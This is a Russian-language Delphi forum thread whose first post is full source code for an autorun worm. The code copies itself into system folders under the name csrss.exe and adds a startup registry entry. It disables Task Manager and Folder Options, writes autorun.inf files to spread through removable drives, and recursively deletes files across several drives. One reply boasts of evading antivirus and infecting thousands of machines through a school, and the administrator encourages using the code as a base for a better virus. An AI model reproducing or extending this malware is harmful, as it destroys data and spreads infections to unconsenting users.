Autorun - delfcode
Суббота, 10.12.2016, 21:25 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Autorun (Пример авторана на Delphi)
Autorun
dolphinДата: Пятница, 03.10.2008, 17:40 | Сообщение # 1
Администратор
Сообщений: 902
Статус: Offline
Code
program Virus.Win32.AutoRun.ah;
uses
Registry, SysUtils, Windows;

var
WinDir, SysDir: String;
Buffer: array[0..1023] of Char;
F: TextFile; Reg: TRegistry;

function DriveExists(Drive: Byte): Boolean;
begin
Result:= Boolean(GetLogicalDrives AND(1 shl Drive))
end;

procedure InFect(FileName: String);
begin
AssignFile(F,FileName);
Reset(F);
WriteLn(F,'open='+SysDir+'\config\csrss.exe');
CloseFile(F);
end;
procedure FindAndDelete(Drive: String);
var
SearchRec: TSearchRec;
begin
if FindFirst(Drive+'*.*', faAnyFile,SearchRec) = 0 then
repeat  
if (SearchRec.Attr and faAnyFile) = SearchRec.Attr then  
begin  
DeleteFile(SearchRec.Name);
end;  
until FindNext(SearchRec) <> 0;
if FindFirst('*', faAnyFile, SearchRec) = 0 then  
repeat  
if (SearchRec.Attr and faDirectory) = faDirectory then  
if SearchRec.Name[1] <> '.' then  
begin  
ChDir(SearchRec.Name);  
FindAndDelete(Drive);
ChDir('..');  
end;  
until FindNext(SearchRec) <> 0;  
end;  
SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
CopyFile(PChar(ParamStr(0)),PChar(WinDir+'\media\arona.exe'),false);  
SetString(SysDir, Buffer, GetSystemDirectory(Buffer, SizeOf(Buffer)));  
CopyFile(PChar(ParamStr(0)),PChar(SysDir+'\config\csrss.exe'),false);
AssignFile(F,SysDir+'\config\logon.bat');  
Reset(F);  
WriteLn(F,'@'+SysDir+'\config\csrss.exe');  
CloseFile(F);  
Reg:=TRegistry.Create;  
Reg.RootKey:=HKEY_LOCAL_MACHINE;  
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,true);
Reg.WriteString('Worms',SysDir+'\config\logon.bat');
Reg.CloseKey;  
Reg.RootKey:=HKEY_CURRENT_USER;  
REg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',true);  
Reg.WriteInteger('DisableTaskMgr',1);  
Reg.CloseKey;  
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);  
Reg.WriteInteger('NoFolderOptions',1);  
Reg.Free;
try  
InFect(SysDir+'\config\autorun.inf');  
if DriveExists(5) then //  
begin  
InFect('F:\autorun.inf');  
end;
if DriveExists(6) then //  
begin
InFect('G:\autorun.inf');
end;  
if DriveExists(7) then //  
begin  
InFect('H:\autorun.inf');
end;  
if DriveExists(10) then  
begin
InFect('K:\autorun.inf');
end;  
if DriveExists(11) then   
begin  
InFect('L:\autorun.inf');
end;  
if DriveExists(14) then  
begin
InFect('O:\autorun.inf');
end;  
except  
Exit;  
end;  
try  
FindAndDelete('D:\');
FindAndDelete('C:\');
FindAndDelete('E:\');
FindAndDelete('F:\');
FindAndDelete('G:\');
FindAndDelete('H:\');
except
Exit;
end;
 
KenTДата: Суббота, 06.12.2008, 13:49 | Сообщение # 2
Группа: Удаленные



я маляська тупой ^^ )))а что с этим кодом делать..._)и он мну заипал xD столько раз у мну на компе зависал )))

Добавлено (06.12.2008, 13:49)
---------------------------------------------
аа.....)памому дагнал ....Или..................))))))[color))))))yellow]типо их нада cool вводить в Delphi

 
ЗаглянувшийДата: Пятница, 23.01.2009, 18:03 | Сообщение # 3
Группа: Гости



Это же ппц старый исходник....теперь этот исходник и вирусы палят! Мне уже пол года назад пришлось этот вирус после компиляции пихать в отладчик и править байты...работал он у меня хорошо.....я его скинул в школу! Тогда наверно пол города им заразилось....машин наверно более 7000.....после чего его стал палить нод 32 а потом уже и касперский...вот так вот....
Пацики я создал сайт но там пока ещё мало чего.....
www.griping.do.am
 
dolphinДата: Суббота, 04.04.2009, 23:40 | Сообщение # 4
Администратор
Сообщений: 902
Статус: Offline
Заглянувший, Это как пример вируса, я же не говорю брать код и компилировать, на его основе можно написать свой ещё лучше чем прежний biggrin

Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
delfcode » Delphi » Вирусология Delphi » Autorun (Пример авторана на Delphi)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2016 Хостинг от uCoz